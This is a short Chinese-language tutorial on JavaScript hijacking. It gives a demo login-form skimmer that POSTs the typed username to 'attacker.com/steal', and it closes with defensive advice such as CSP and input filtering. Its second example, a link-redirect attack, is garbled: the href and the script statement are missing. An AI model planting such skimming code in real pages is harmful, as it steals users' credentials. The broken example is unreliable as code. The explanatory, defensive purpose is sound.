Javascript劫持是一種安全威脅形式，指黑客將惡意腳本注入到網站上，從而獲取網站的隱私信息或控制網站。這種攻擊可以使用多種方式進行，但它們的本質都是通過改變網頁的行為來實現。下面我們將看到一些用于演示Javascript劫持的例子。

Javascript劫持的一種常見形式是通過在輸入字段中注入腳本來盜取用戶信息。下面這個例子通過一個簡單的登錄表單來演示這種攻擊：

<form name="login-form" method="post" action="http://example.com/login">
<label>Username:</label>
<input type="text" name="username" value="">
<label>Password:</label>
<input type="password" name="password" value="">
<button type="submit">Login</button>
</form>
<script>
document.querySelector('input[name="username"]').addEventListener('change', function() {
var xhr = new XMLHttpRequest();
xhr.open('POST', 'http://attacker.com/steal', true);
xhr.send('username=' + this.value);
});
</script>

在這個例子中，我們將一個事件監聽器綁定到用戶名輸入框上。當用戶輸入用戶名時，腳本會立即發送一個POST請求到攻擊者的服務器上，這個請求中包含了用戶輸入的用戶名。如果攻擊者成功將惡意腳本嵌入到網站中，那么他就可以從服務器上獲取到用戶的登錄信息。

另一種Javascript劫持的形式是通過修改鏈接或網站中的按鈕來篡改網站的行為。以下是一個演示這種攻擊的例子：

<a >My Account</a>
<script>
document.querySelector('a').;
</script>

在這個例子中，我們將“我的賬戶”鏈接的目標URL修改為攻擊者的偽造網站。如果用戶單擊這個鏈接，他們將被重定向到攻擊者的網站上，而不是到真正的賬戶頁面上。

Javascript劫持是一種十分嚴重的安全問題，因此開發者需要采取必要的措施來保護他們的網站不受此攻擊。下面是一些可行的防范措施：

• 使用內容安全策略 (CSP) 限制可以執行的腳本代碼。
• 使用HTTPS加密通信，以免腳本被中間人篡改。
• 僅信任已驗證的源來提供腳本代碼。
• 使用安全的編碼實踐，如過濾用戶輸入和編寫規范的代碼。

總之，Javascript劫持是一種十分嚴重的安全問題，可以極大地危害到用戶和開發者的利益。我們應該采取必要的防范措施來保護我們的網站和用戶不受到此攻擊。